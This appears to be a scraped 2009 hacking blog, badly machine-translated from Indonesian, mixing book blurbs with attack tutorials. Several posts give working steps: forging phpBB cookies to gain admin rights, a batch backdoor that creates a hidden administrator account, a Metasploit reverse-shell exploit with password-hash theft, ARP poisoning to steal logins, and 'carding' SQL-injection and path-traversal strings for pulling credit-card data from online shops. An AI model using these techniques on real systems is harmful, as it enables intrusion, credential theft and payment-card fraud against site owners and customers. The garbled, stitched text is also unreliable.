Oracle PL/SQL for DBAs

2009-08-09T00:57:00.000-07:00

Description

PL/SQL, Oracle's powerful procedural language, has been the cornerstone of Oracle application development for nearly 15 years. Although primarily a tool for developers, PL/SQL has also become an essential tool for database administration. DBAs who have not yet discovered how helpful PL/SQL can be will find this book a superb introduction to the language and its special database administration features. Even if you have used PL/SQL for years, you'll find the detailed coverage in this book to be an invaluable resource.
Full Description
PL/SQL, Oracle's powerful procedural language, has been the cornerstone of Oracle application development for nearly 15 years. Although primarily a tool for developers, PL/SQL has also become an essential tool for database administration, as DBAs take increasing responsibility for site performance and as the lines between developers and DBAs blur.

Until now, there has not been a book focused squarely on the language topics of special concern to DBAs Oracle PL/SQL for DBAs fills the gap. Covering the latest Oracle version, Oracle Database 10g Release 2 and packed with code and usage examples, it contains:

* A quick tour of the PL/SQL language, providing enough basic information about language fundamentals to get DBAs up and running
* Extensive coverage of security topics for DBAs: Encryption (including both traditional methods and Oracle's new Transparent Data Encryption, TDE); Row-Level Security (RLS), Fine-Grained Auditing (FGA); and random value generation
* Methods for DBAs to improve query and database performance with cursors and table functions
* Coverage of Oracle scheduling, which allows jobs such as database monitoring and statistics gathering to be scheduled for regular execution

Using Oracle's built-in packages (DBMS_CRYPTO, DBMS_RLS, DBMS_FGA, DBMS_RANDOM, DBMS_SCHEDULING) as a base, the book describes ways of building on top of these packages to suit particular organizational needs. Authors are Arup Nanda, Oracle Magazine 2003 DBA of the Year, and Steven Feuerstein, the world's foremost PL/SQL expert and coauthor of the classic reference, Oracle PL/SQL Programming.

DBAs who have not yet discovered how helpful PL/SQL can be will find this book a superb introduction to the language and its special database administration features. Even if you have used PL/SQL for years, you'll find the detailed coverage in this book to be an invaluable resource.

Simply SQL

2009-08-09T00:56:00.001-07:00

Description
Simply SQL is a practical step-by-step guide to writing SQL. You'll learn how to make the most of your data using best-practice SQL code. Rather than bore you with theory, it focuses on the practical use of SQL with common databases and uses plenty of diagrams, easy-to-read text, and examples to help make learning SQL easy and fun. Full Description
Packed with examples, Simply SQL is a step-by-step introduction to learning SQL. You'll discover how easy it is to use SQL to interact with best-practice, robust databases. Rather than bore you with theory, it focuses on the practical use of SQL with common databases and uses plenty of diagrams, easy-to-read text, and examples to help make learning SQL easy and fun.

* Step through the basic SQL syntax
* Learn how to use best practices in database design
* Master advanced syntax like inner joins, groups, and subqueries
* Understand the SQL datatypes
* And much more...

Backup & Recovery

2009-08-09T00:52:00.000-07:00

Description

Packed with practical, freely available backup and recovery solutions for Unix, Linux, Windows, and Mac OS X systems -- as well as various databases -- this new guide is a complete overhaul of Unix Backup & Recovery by the same author, now revised and expanded with over 75% new material.
Full Description
Packed with practical, freely available backup and recovery solutions for Unix, Linux, Windows, and Mac OS X systems -- as well as various databases -- this new guide is a complete overhaul of Unix Backup & Recovery by the same author, now revised and expanded with over 75% new material.

Backup & Recovery starts with a complete overview of backup philosophy and design, including the basic backup utilities of tar, dump, cpio, ntbackup, ditto, and rsync. It then explains several open source backup products that automate backups using those utilities, including AMANDA, Bacula, BackupPC, rdiff-backup, and rsnapshot. Backup & Recovery then explains how to perform bare metal recovery of AIX, HP-UX, Linux, Mac OS, Solaris, VMWare, & Windows systems using freely-available utilities. The book also provides overviews of the current state of the commercial backup software and hardware market, including overviews of CDP, Data De-duplication, D2D2T, and VTL technology. Finally, it covers how to automate the backups of DB2, Exchange, MySQL, Oracle, PostgreSQL, SQL-Server, and Sybase databases - without purchasing a commercial backup product to do so.

For environments of all sizes and budgets, this unique book shows you how to ensure data protection without resorting to expensive commercial solutions. You will soon learn to:

* Automate the backup of popular databases without a commercial utility
* Perform bare metal recovery of any popular open systems platform, including your PC or laptop
* Utilize valuable but often unknown open source backup products
* Understand the state of commercial backup software, including explanations of CDP and data de-duplication software
* Access the current state of backup hardware, including Virtual Tape Libraries (VTLs)

Password Hacking: Programs and Tools Make it Easy

2009-08-09T00:49:00.000-07:00

Dictionary attacks are another technique among password hacking programs. It is more sophisticated than a brute force attack but not as complex as a hash function password program. Although it could be considered similar to a brute force attack, the main difference between these two is that a dictionary attack uses determined words,
hoping that the creator of the password used words that can be found in any dictionary. It may sound a bit foolish but reality has shown that people are not very careful with their passwords.

What Are the Tools Available For Password Hacking
There are many password hack tools available in the internet. Some of them are free, others are available for a small fee. For example, there is Rainbowcrack. This tool was created for cracking hash passwords through brute force; it may not be very sophisticated, but it does the job.

Another example is LC5 (formerly known as L0phtCrack). It recovers Microsoft Windows passwords using dictionaries, brute force or a combination of both. Unfortunately, it won't be available after 2006 since Symantec acquired it.

Rate this Article
Excellent

Good

Average

Bad

Terrible

rate

Current Rating
John the Ripper is another password cracking tool, and can run in a series of platforms. Considered one of the most popular password hacking programs, it combines different cracker programs into one package. It uses the dictionary attack for searching hash passwords and also has a brute force mode.

Another Windows recovery tool is Cain and Abel. This software package uses a series of tools for password recovery, like dictionary, brute force and cryptanalysis attacks (that means that it looks for a key for accessing the password, something like the password's password).

Rixler Software is a company who offers a service of password cracking for different kind of programs, like Word, Excel, Access, VBA, Outlook Express and Internet Explorer. They offer personal and business licenses, depending on your needs.

Brutus is considered by its creator one of the fastest and more flexible password crackers in the market. The good thing about this tool is that it is a free password hacker. The bad thing is that it is only available for Windows 9x, NT and 2000.

Password hacking, passwords hackers, password protection, it doesn't matter which of those concepts are wandering through your head. If you want to be able to hack passwords, let's say, for some client who forgot his recently changed password, then you will have to practice a bit and maintain yourself updated on the latest trend of password hacking programs.

Chat With Command Prompt

2009-08-09T00:46:00.000-07:00

If you want a private chat with a friend or client on you Network, you don't need to download any fancy program!
All you need is your friends IP address and Command Prompt.

Firstly, open Notepad and enter:

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

Now save this as "Messenger.bat". Open the .bat file and in Command Prompt you should see:

MESSENGER
User:

After "User" type the IP address of the computer you want to contact.
After this, you should see this:

Message:

Now type in the message you wish to send.
Before you press "Enter" it should look like this:

MESSENGER
User: 56.108.104.107
Message: Hi

Now all you need to do is press "Enter", and start chatting!

Learn how HACKING

2009-08-08T07:30:00.000-07:00

following are some tricks for the info n HACKING survivors try ya bro?

that all do not try to hurt other people.
cuma for this we learn how Hacked busy now in the era of globalization

Time to learn from here that for our country INDONESIA willingly die for the sake of love

Defacing
Steps Deface PHPBB/PHPBB2 Loser_cs_20

1. Download Mozilla FireFox browser

2. Download pluginnya I called LiveHTTPHeader
download at hxxp: / / livehttpheaders.mozdev.org / installation.html
is a new search

3. target with the next search with Google Uncle syntax:
phpBB site: [What's up aja]

4. after that we open the plugin you downloaded earlier in the Tools -> LiveHTTPHeader

5. Remember, the content must be empty LiveHTTPHeader

6. open the target site, so LiveHTTPHeader will take all the cookies you recorded in the target page

7. after a successful open page marked with a "done" at the bottom of the browser, the next step is clicking LiveHTTPHeader resumed in the middle click option Replay ..

8. after open LiveHTTPReplay liat under this section as the LiveHTTPReplay ...

Quote:
Cookies: phpbb2mysql_data = a% 3A0% 3A% 7b% 7D; phpbb2mysql_sid = 88da2bbdc1a3a789df094d50d91f7e3b
9. Remove the part and sign the back after the semi colon (

Cookies: phpbb2mysql_data = a% 3A0% 3A% 7b% 7D; phpbb2mysql_sid = 88da2bbdc1a3a789df094d50d91f7e3b
\ _______________remove this part _________________ /

akan happens like this:

Cookies: phpbb2mysql_data = a% 3A0% 3A% 7b% 7D

10. and click on the replay again, so that the target page will reload all the cookies you have been our manipulation

11. note the next steps below:

Quote:
Cookies: phpbb2mysql_data = a% 3A0% 3A% 7b% 7D
\ ________remove in this section and replace with:

Cookies: phpbb2mysql_data = a: 2 (s: 11: "auto loginid"; s: 32: "602b aahpepms74d4cb6f2d012e1e4019"; s: 6: "user id"; s: 1: "2";)
12. and click on the replay again, so that the target page will reload all the cookies you have been manipulating us earlier.

13. note this step again:

Quote:
Cookies: phpbb2mysql_data = a: 2: (s: 11: "auto loginid"; s: 32: "602 baahpepms74d4cb6f2d012e1e4019"; s: 6: "user id"; s: 1: "2";)
\ ____________________This part is replaced again________________________ jg /
be like this:

Cookies: phpbb2mysql_data = a% 3A2% 3A% 7Bs% 3A11% 3A% 22autologini d% 22% 3Bb% 3A1% 3Bs% 3A6% 3A% 22userid% 22% 3Bs% 3A1% 3A% 222% 22% 3B% 7D

14. and click on the replay again, so that the target page akan mereload all the cookies you have been manipulating us earlier.

15. finished ... please liat the target page, you are lucky you you get full admin.

Please go to the bottom of the page and see the option "Go To Administration Panel" has been shown

Echo Backdoor:
rem * echobackd00r.bat
rem * March 2004 - backd00r for XP & 2000 &
brakes * made to facilitate creating an admin account
* Combine with the brake SPLOITS to get the admin account ex: kaht2
or brake * into a pc with the floppy disks are still the default: P read eksploits local

* FROM brake.

@ echo off
Prompt $ P $ G
cls
Color 87
Goto ad

: setting

replace the brake * USER and PASS

set USER = "backdoor"
set PASS = "password"

if% USER% == "backdoor" Goto Goto else failed process

: Process

brake * into the tuk nambahin user + password

net user% USER%% PASS% / add
net local group Administrators% USER% / add
net local group Users% USER% / delete

cls
echo.
Account echo% USER%% PASS with password% has been successfully created!
color 70

EXIT

: ad

rem * a banner from me, can be removed

echo.
echo ################################################
echo # #
echo # # Echobackd00r
# echo created by & & tested with XP OS y3dips #
echo # greetz to: the_day for idea, Moby, z3r0byt3, comex, Puji * #
echo # note: change the USER and PASS #
echo # #
echo ################################################# # #
echo.
echo press ENTER!
pause> nul

Goto settings

: failed

echo.
echo echobackd00r.bat edit the file and change the USER and PASSnya
echo.

rem * Done.

Continued ...........

Study Hack Yuck! (3) - Hack Windows XP SP2

2009-08-08T06:59:00.000-07:00

After knowing a few basic concepts and the 'standard' about the hack that first discussed the material and know little about the exploit in the second section, we now directly aja practice. Here I deliberately use VMWare to do the simulation, because not all people can mempraktekannya in a network. By using VMWare, we can simulate a simple network that seems to have a network consisting of our own computer and other computers. For those who can not use VMWare, try searching diinternet! Operating System that I use is Windows XP SP2.

Tools that I use is to do the Metasploit Framework exploit and to take PwDump6 hash file from the target computer. What is the Metasploit Framework?

The Metasploit Framework is a complete environment for writing, testing, and using exploit code. This environment provides a solid platform for penetrationtesting, shellcode development, research, and Vulnerability.

For more information about the use of Metasploit, you can read dokomentasi also included in the installation. To install metasploit version 2.7, users needed administrator. I try to install with a 'limited user', but once installed can not run. Actual installation metasploit just unpack this file only. So you can install without having to get the admin user and put it anywhere without having to install in the Program Files folder. However, after a little dioprek, apparently does not need the admin can run. Ribet slightly and Reviews males do here, soalnya when trying the latest version, the version 3 Beta 3, we can run it without having to install the admin user. Gitu aja ko busy! Moreover version 3 (skarang msh beta) feature more cool and more. But unfortunately for msfweb (version webnya) has not been able to run fully.

Ok .. now I assume you have read the userguide metasploit (ah.. I most incorrect assumption; p). Let cool and more plasticity to understand the details, I explain metasplooit using the console (mfsconsole) only. Metasploit using cygwin to run it, because it made use metasploit Perl. Now let us praktekkan!

first run 'mfsconsole'!

Command to learn what is in the MSFConsole use the command 'help'.

Because the computer that you want to be a target is Windows XP SP2, then use the exploit affecting XP SP2 is to exploit weaknesses in Internet Explorer VML Fill Method Code Execution.

This module exploits a code execution Vulnerability in Microsoft Internet Explorer using a buffer overflow in the processing VML code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.

To view the info from this exploit use the command:

MSF> ie_vml_rectfill info

Exploit ie_vml_rectfill exploit weaknesses in Internet Explorer. Therefore, this exploit will have an impact if the target machine to run IE and direct url to the computer to its attacker. For that, we must use a little 'social engineering', as if in kost / lab / office to us is our friends that we are trying to make the latest web application, and have seen how to use IE to an IP address (or computer name) us. Suppose http://192.168.186.1. Usually after this exploit is executed and the target computer has been connected, then IE will crash. Leave some time to exploit the 'work'. After some time aja bilang "wah .. I have error. Ok deh .. betulin my first try ... makasih ya. " New IE close its a Task Manager (even if a CE, IE in msh hard-kill, not to forget me-'end process'-kan 'dumpred.exe' also, but after the exploit work:-D).

To exploit the use perintah2 following in console:

MSF> use_ie_vml_rectfill

MSF> set payload win32_reverse

MSF> set RHOST ip_target

MSF> set LHOST ip_attacker

MSF> exploit

The result will look like the image below:

In the example above, the target computer's IP (RHOST) is 192168186128, whereas the computer attacker (LHOST) is 192.168.186.1. And the 'payload' is used 'win32_reverse' PORT and HTTP is 80 (default http port). After running the command 'exploit', we have a new target machine to run IE and its direct url to our computer. This process will take some time, even sometimes not successful. So try and hold aja:-D

If you are successful, then you will get the 'cmd.exe' from the target computer.

Crack Password!

Well, after we 'control' the target computer, skalian aja password we see it. How similar to my previous article about Win XP SP2 Hack Password, but because it is remote, we must 'provide' program that is required PwDump. To be successful this way, I assume on the target computer users who are logged in have access to admin. I used a computer user who used the target is only IE user 'normal', pwdump will not succeed!

First we used to share PwDump from our computer with full access so that we can upload the dump target computer password, but ending with '$' though not visible public computer. Suppose the name of the folder in the share PwDump $. Then from the console that was successful dihack, take PwDump with the Map Network Drive from the computer with our 'net use'. Examples of commands used

After that Pwdump copy to the target computer in the temporary folder, 'temp'. After successful in-Pwdump copy to the target computer, run the command Pwdump

C: \ temp \ Pwdump-o pass.txt 127.0.0.1

How successful will appear in the image below.

Then copy the files to the computer we pass.txt

C: \ temp \ copy pass.txt z:

And last, do not leave the impression that we have come by over there.

Nah, I can be a result of its files. Living in the crack only .... (see previous article for nge-crack password).

In fact many can dioprek from metasploit. Metasploit in many exploit, payload, meterpreter, etc. a very 'fun' to dioprek. To learn metasploit, disitusnya there is documentation of the rather good.

Happy Hacking ... ..

Some suggestions so that we remain safe windows to exploit above.

1. Do not use Internet Explorer. Use Mozilla Firefox or Opera.

2. Patch your Windows.

3. Use anti-virus with latest update

4. heart2 friend of your own .. alert!

Collection 63 Keylogger Options

2009-07-25T03:50:00.000-07:00

For the lamerz maniak certain hacking tools often hear Keylogger. : D. What is a Keylogger? Keylogger is a tool that basically has a function for monitoring all akitivitas done by the user on a PC. Start of recording password that diketikan, chatting on instant messaging, programs are executed by the user, what the user on the program, and all the diketikkan on the keyboard to mouse movement, and even some of the Keylogger has been long outstanding include facilities pengcapture screen monitor once every 5 minutes, and the output is HTML. There are quite a few interesting Keylogger, among which there can send the results of monitoring activities to the investor email Keylogger is. So that the grower Keylogger can see all the activities done by the user on a pc via email.
Clearly this is controversial Keylogger as 2 blade, positive, negative, build and destroy. Not enough time to discuss all this.
Add to your collection of hacking tools,: D, please download the latest 63 Keylogger is powerful ...

Following list:
1. 007 Keylogger Spy Software 3873
2. Active Key logger 2.4
3. Activity Keylogger 1.80.21
4. Activity logger 3.7.2132
5. ActMon Computer Monitoring 5:20
6. Actual Spy 2.8
7. Advanced Invisible Keylogger V1.9
8. Advanced Keylogger 1.8
9. Ardamax Keylogger 2.9
10. BlazingTools Perfect Keylogger 1.68
11. Remote Blazingtools logger v2.3
12. Data Doctor Keylogger Advance v3.0.1.5
13. Local Keylogger Pro 3.1
14. ExploreAnywhere Keylogger Pro 1.7.8
15. Family Cyber Alert 4:06
16. Family Keylogger 2.80
17. Firewall bypass Keylogger 1.5
18. Free Keylogger 2:53
19. Ghost Keylogger 3.80
20. Golden Eye 4.5
21. Golden Keylogger 1:32
22. Handy Keylogger 3:24 build 032
23. Home Keylogger 1.77
24. Inside Keylogger 4.1
25. iOpus Starr PC and Internet Monitor 3:23
26. iSpyNow v2.0
27. KeyScrambler 1.3.2
28. Keystroke Spy 1:10
29. KGB Keylogger 4.2
30. KGB Spy 3.84
31. LastBit Absolute Key logger 2.5.283
32. Metakodix Stealth Keylogger 1.1.0
33. Network Event Viewer v6.0.0.42
34. OverSpy v2.5
35. PC Activity Monitor Professional 7.6.3
36. PC Spy Keylogger 2.3 build 0313
37. PC Weasel 2.5
38. Personal PC Spy v1.9.5
39. Power Spy 6:10
40. Powered Keylogger v2.2.1.1920
41. Quick Keylogger 2.1
42. Radar 1.0
43. Real Spy Monitor 2.80
44. Real Spy Monitor 2.80
45. Remote Desktop Spy 4:04
46. Remote Keylogger 1.0.1
47. Revealer Keylogger Free 1:33
48. SC Keylogger Pro 3.2
49. Smart keystroke Recorder Pro
50. Spector Pro 6.0.1201
51. SpyAnytime PC Spy 2:42
52. SpyBuddy 3.7.5
53. Spytech SpyAgent 6:02:07
54. Spytector 1.3.5
55 Stealth Key logger 4.5
56. System Keylogger 2.0.0
57. Tim's Keylogger 1.0
58. Tiny Keylogger 2.0
59. Total Spy 2.7
60. Windows Keylogger 5:04
61. Win-Spy Pro 8.9.109
62. XP Advanced Keylogger 2.5
63. XPCSpy Pro version 3:01

2009-07-25T03:46:00.000-07:00

LAN Hacking tutorial (Create a Newbie who want to learn hack)
How to hacking via the LAN (to steal a pass people browsing)
First of all sorry I repost this technique because the technique is not fresh in the world of hacking, but this technique has not been stale because up to now can still be used because most network meggunakan network hub & switch that does not terenkripsi.Mengapa not encrypted?
* Network Admin is the person most of the IT specialist in making the program, not in Network Security * If the encrypted bandwidth will need inet increased and of that already this lemot akan lemot and finally the error page * price is not cheap to obtain the encrypted
The difference between the Hub and Switch network:
* At the network hub of all data that flows in the network can be viewed / retrieved by any computer on the network asalakan computer merequest data, I do not direquest will not come .* The network switch that the computer only to exchange data to see data , the other komputer2 not entitled merequest data.
The problem is the price of the hub router and switch does not differ greatly so most places are now using the method to make the switch network hacking.
Hacking using this technique:
* * Sniffing ARP Poison Routing
The two techniques above will not be prevented by a firewall on any computer of the victim, guaranteed.
Important Note: ARP Poison Routing can meyebabkan denial of service (dos) on one of / all the computers on your network
Advantages:
* Not detected by the firewall types and any series because kelemahannya located on the network system not on the computer * can steal all of the login password via the HTTP server * can steal all the login password of the Hub in the network is activated during the program * To ARP poisoning can be used to steal your password in the HTTPS * All programs free
Disadvantages:
* To be at Switch network ARP poisoning at 1 and bandwidth you will be eaten accidentally much for it (I inet super fast ga problems) * discovered not by the network admin outside my responsibilities
Start from here that's in the network in this story have 3 computers, which are:
* Victims * Computers * Computer Hacker Server
Differences between the network switch and a network hub: The first step:
1. Check your network type, you have the network switch / hub. If you are in the network hub be grateful because the process of hacking you will be far more mudah.2. Download the programs that is needed Wireshark and Cain & Abel.Code:
http://www.wireshark.org/download.htmlhttp://www.oxid.it/cain.html
How to Use WireShark:
* Run the program wireshark * Press Ctrl + k (option-click capture ago) * Make sure the content is Interfacenya your Ethernet card for the network, if not change and make sure that "Capture packets in promiscuous mode" * Click on the button start * Click the stop button after you are sure that no password is entered for you to press the start button you can see all types of the packet in the incoming and outgoing network (or on your computer only if you use a network Swtich * To analyze the data is right-click on the data want in the analysis and click "Follow TCP Stream" and congratulations to analyze paketnya (I will not explain how because I can not) * What's clear from the data is definitely in there informasi2 entered the victim to the website and vice versa
How the above applies only if your network is not the Hub switchDari on how you can know that your network is a hub / switch with a view in the IP Source and Destination IP. When the line on every one of them is the ip then you can be your network is a network switch, if I do not mean otherwise.
How to Use Cain & Abel:
* The use of this program is much easier and simple than using wireshark, but if you want a packet of all exit and entry is recommended you use the wireshark program * Open the program you Cain * Click on the configure * In the "Sniffer" select ethernet card akan you use * In the "HTTP Fields" you must add a username and password fields when its fields you want is not in daftar.Sebagai example, I will inform you that I want to hack password Friendster you need to add the username in the fields and fields passworsd word name , to the other you can find it by pressing the right click view source and you should find a variable input login and password from the website. Which is already in default rasanyan already full enough, you can steal a pass in there without adding any klubmentari .* After that settingannya apply and click ok * In the main menu there are 8 tabs, and will be discussed only 1 tab is the tab "Sniffer" Therefore, select the tab and it should not pindah2 of the tab to prevent confusion * Activate your own Sniffer with sniffer clicking the button on the top tab2, the search for the key writings that "Start / Stop Sniffer" * If you have time in the network hub This you already know the password can be entered with a click on the tab (The tab on the bottom that is not in the middle, which is the no-click-clicked again) "Passwords" you choose a password from the connection which you want to see akan already registered there * If you have appeared on the network switch, this requires more struggle, you must activate the APR tombolonya have the right Sniffer (And this does not guarantee successful manage because of the switch is far more comprehensive & secure from the hub) * Before the activated the sniffer tab select the bottom of the APR * 2 will be seen that the list is empty, click on the top of the list is empty and then click the "+" (such as the form) that is in the range key sniffer APR etc. * There will be 2 fruit which contains all the field the host on your network * Connect the victims ip address ip address and gateway servers (to know the address of the gateway server on the computer click start you select run and type cmd type ipconfig in the command prompt) * Once the new switch the APR, and all the data from victim to the server computer you can see in the same way.
You can run both programs simultaneously in the top (for APR Cain and wireshark for packet sniffing) when you want a more maximum results.
Password that you can steal the password of the HTTP server (the server that is not encrypted), if the data is encrypted on the server that you have to mendekripsi data obtained before the password (and that will require that STEP 2 is much more of how long this hack )
For terms that are not ngerti can be searched on wikipedia (but that is what the English indo jg not have).

Recognize The Man-In-The-Middle (MITM)

2009-07-25T03:28:00.000-07:00

Many articles that discuss the techniques ilmuhacking attack man in the middle (mitm), but I have never been explained in detail about what it mitm attack. Mitm attack is a type of attack is extremely dangerous and can happen anywhere, in the website, mobile phone, as well as in the traditional communication tools such as correspondence. Therefore, I think one needs to have a special article that discusses mitm attack irrespective of any technical implementation and
wherever.

Not Sekedar Sniffing

Many may think that the goal of the attack mitm is to extract confidential data communications, such as sniffing. Sniffing can be called a passive attack, because in the sniffing attacker does not do any action other than monitoring the data through. It is true that the attack mitm, an attacker can find out what is discussed by the two parties to communicate. But actually the biggest strength of mitm not the ability sniffingnya, but on the ability to intercept and change communications mitm attack can be so called as the type of active attack.

Picture below is a scenario that can be done with the attacker attacks mitm.

In the picture shown is the 4 types of attacks can be done with the MITM. Here is an explanation of the types of attacks in a scenario such as the image above.

* Sniffing: Charlie knows all discussion between Alice and Bob.
* Intercepting: Charlie intercept a message from Alice when Alice wanted to close the conversation with "Bob I'm going to sleep, Bye!". This way Bob thinks Alice is communicating with.
* Tampering: Charlie answers change from Bob to Alice bob Paypal account to be charlie.
* Fabricating: Charlie asks the social security number to Bob, when this question was never asked by Alice.

Mitm with how this could be how large the potential damage that can be done Charlie to Alice and Bob.

The attack is the Man-in-The-Middle

Mitm in the attack, an attacker will be in the midst of the communications between two parties. The whole discussion going on between them should be through the first attacker in the middle. Attacker with a lavish do tapping, pencegatan, conversion even forge communication as I have described previously.

Now let us see the example of a MITM in case Alice communicates with Bob. Charlie as the attacker will try to be in the middle between Alice and Bob. In order for Charlie to be successful the people, then Charlie should:

* Masquerade as Bob before Alice
* Masquerade as Alice before Bob

In mitm, suppose Alice are talking with Bob, but that he was talking with Charlie. Bob Similarly, he thinks are talking with Alice, when, in fact that he was talking with Alice. So that people can be in the middle of Charlie can be incognito in the two sides, not only on one side only.

Why Alice and Bob can be trapped and deceived by Charlie? That is because Alice and Bob does not perform authentication before communication. Alice ensure authentication akan Bob spoke with the original, not the fake Bob diperankan by Charlie. As well as authentication, Bob will speak with the original Alice, Alice is not a false diperankan by Charlie.

Importance of Authentication: Who Are You Speaking With?

Authentication is the process to prove the identity of a subject, can the person or machine. The process of proving identity seeorang there are many ways, but all can be grouped in 3 categories:

* What you know: a PIN, password, public key-pair private
* What you have: smart card, key, USB dongle
* What you are: fingerprint, retina

In short the authentication question "Who are you speaking with?". The question is very important note before the two parties to communicate. When the two parties to communicate without prior authentication, they can be stuck talking with the wrong people, namely people who masquerade be talking opponents. If this happens then the consequences can be fatal, one of which is the occurrence of mitm attack.

When two people who already know each other face-to-face talk with directly, then they may not get stuck talking to the misguided and the wrong people. Authentication becomes very important when both parties talk through the media of communication such as long distance telephone or internet. In long-distance communication, we can only hear us talk opponents, so very likely we are talking with the wrong people.

So how to prevent the MITM attack is to perform authentication before communication. Even if authentication is done by one party only, it is sufficient to prevent mitm. Let us see again the example Alice, Bob and Charlie, if the authentication is only done by Bob, while Alice does not. Because of the absence of authentication Alice, then Charlie can masquerade as Alice in front of Bob, but Charlie can not masquerade as Bob in front of Alice. What Charlie can not disguise a Bob? For Alice akan Bob test the authenticity of the authentication, so that masquerade as Bob Charlie uncovered false akan akan and Alice does not want to continue communication.

Disclaimer

2009-07-25T03:24:00.000-07:00

In a related site with so many controversial topics and skills, it is important to anticipate the incident and implement the provisions of the agreement and the service users. We want to provide a free place to learn, safe and legal for users of this site.

By reading this site, you agree to the following conditions:

1. All information available on this site is for educational purposes only. This site is not responsible for the misuse of any information.
2. "Science Hacking" is a title that reflects the content of the site and not a site that provides all the information illegally. IlmuHacking.com is a site related to Computer Security, and not a site that promotes hacking / cracking.
3. This site is really intended to provide information about "Network Security" and other topics related and not related to the term "cracking" or "HACKING" (which is unethical).
4. Some articles (posts) at this site that contains information related to "Hacking Password" or "Hacking Email Account" (or similar term) is not a Hacking guide. Articles that only provide information about the valid password to get back lost / forgotten.
5. All information on this site is intended to develop the attitude "Hacker Defense" between the user and to help prevent attacks. IlmuHacking.Com prohibit the use of this information for any damage caused directly or indirectly.
6. The word "Hack" or "Hacking" which is used on this site should be defined as "Ethical Hack" or "Ethical Hacking".
7. Some of the tricks provided by us may no longer work because of improvements to the bug that allows exploits. We are not responsible for any damages directly or indirectly caused by the use of hacks provided on this site.

Engineering carding

2009-07-22T01:35:00.000-07:00

1. example in the form of bugs shopadmin shop system:
example shop will appear on search engines when some mengetikan
keyword, such as:
Google.com Type: -> allinurl: / shopadmin.asp
Sample target: www.xxxxxx.com / shopadmin.asp
The weakness of this system if criminals enter the
code injection, such as:
user: 'or'1
pass: 'or'1

2. example in the form of bugs shop system: Index CGI
example shop will appear on search engines when some mengetikan
keyword, such as:
google.com: Type -> allinurl: / store / index.cgi / page =
Sample target: www.xxxxxx.com/cgi-bin/store/index.cgi?page=short_blue.htm
Delete and replace with short_blue.htm -> .. / admin / files / order.log
The result: www.xxxxxxx.com/cgi-bin/store/index.cgi?page=../admin/files/
order.log

3. example in the form of bugs shop system: metacart
example shop will appear on search engines when some mengetikan
keyword, such as:
google.com allinurl: / metacart /
Sample target: www.xxxxxx.com / metacart / about.asp
Moreinfo.asp Remove and replace with -> / database / metacart.mdb
The result: / www.xxxxxx.com / metacart / database / metacart.mdb

4. example in the form of bugs shop system: DCShop
example shop will appear on search engines when some mengetikan
keyword, such as:
google.com: Type -> allinurl: / DCShop /
Example: www.xxxxxx.com / xxxx / DCShop / xxxx
Remove / DCShop / xxxx and replace with -> / DCShop / orders / orders.txt
or / DCShop / Orders / orders.txt
The result: www.xxxx.com / xxxx / DCShop / orders / orders.txt

5. example in the form of bugs shop system: PDshopro
example shop will appear on search engines when some mengetikan
keyword, such as:
google.com: Type -> allinurl: / shop / category.asp / catid =
Example: www.xxxxx.com/shop/category.asp/catid=xxxxxx
Remove / shop / category.asp / catid = xxxxx dang replace with -> / admin /
dbsetup.asp
The result: www.xxxxxx.com / admin / dbsetup.asp
From above description, we will see a file with a database name
sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb with the url into its
www.xxxxxx.com / data / pdshoppro.mdb
Open the page file use Microsoft Access (the database to read
access.mdb should aja pake ms access)

6. example in the form of bugs shop system: commerceSQL
example shop will appear on search engines when some mengetikan
keyword, such as:
google: Type -> allinurl: / commercesql /
Example: www.xxxxx.com / commercesql / xxxxx
Remove commercesql / xxxxx and replace with ->
cgi-bin/commercesql/index.cgi? page =
The result: www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page =
To view the admin config ->
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
To view the admin manager ->
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
To view the log file / CCnya ->
www.xxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order ...

7. example in the form of bugs shop system: eShop
example shop will appear on search engines when some mengetikan
keyword, such as:
google: Type -> allinurl: / eShop /
Example: www.xxxxx.com / xxxxx / eShop
Remove / eShop and replace with -> / cg-bin/eshop/database/order.mdb
The result: www.xxxxxx.com / ... / cg-bin / eShop / database / order.mdb
Download the file and its *. mdb Open the page file use Microsoft Acces
(to read the database because it is a access.mdb ms access
aja)

8. example in the form of bugs shop system: Cart32 v3.5a
example shop will appear on search engines when some mengetikan
keyword, such as:
google.com: Type -> allinurl: / cart32.exe /
Example: www.xxxxxx.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound
Replace with NoItemFound -> error
If we find some error information page under installation,
means that we will succeed!
Now, we go on the information below, slide the page
down, and search the Page Setup and Directory
If the file is there with a list format / suffixes. C32
means that the page in the site. there is a file containing data cc
Copy a file. C32 or everything you have to program or notepad
other text editor.
Change page url string. be like this: http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
Nah .., paste one by one, the file. C32 to the end of the url you have
modified before, with the format
http://www.xxxxx.com/cart32/
Example http://www.xxxxxxx.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32

9. bugs in the form of an example system stores: VP-ASP Shopping Cart 5.0
engineering / road to the two
google.com Type -> allinurl: / vpasp / shopdisplayproducts.asp
Open the target url and add the following string at the end of the
shopdisplayproducts.asp
Example:
http://xxxxxxx.com/vpasp/shopdisplayproducts.asp?cat=qwerty '% 20union %...,
fldpassword% 20from% 20tbluser% 20where% 20fldusername =
'admin'% 20and% 20fldpassword% 20like% 20'a% 25' --
Change the value of the last string url dg:
% 20'a% 25' --
20'b%% 25' --
% 20'c% 25' --
If successful, we will get a username and password information
admin
To login to the admin http://xxxx.com/vpasp/shopadmin.asp
Find your own data, please CCnya

10. bugs in the form of an example system stores: VP-ASP Shopping Cart 5.0
example shop will appear on search engines when some mengetikan
keyword, such as:
google.com: Type -> allinurl: / vpasp / shopsearch.asp

Open the url for the target and create a new admin, postingkan following data
one by one in the search engines:
Keyword = & category = 5); insert into tbluser (fldusername) values
('')--& = & SubCategory = hide & action.x = 46 & action.y = 6
Keyword = & category = 5); update tbluser set fldpassword =''where
fldusername =''--& SubCategory = All & action.x = 33 & action.y = 6
Keyword = & category = 3); update tbluser set fldaccess ='1 'where
fldusername =''--& SubCategory = All & action.x = 33 & action.y = 6
Do not forget to change and it's up to you.
To change the admin password, enter the keyword below:
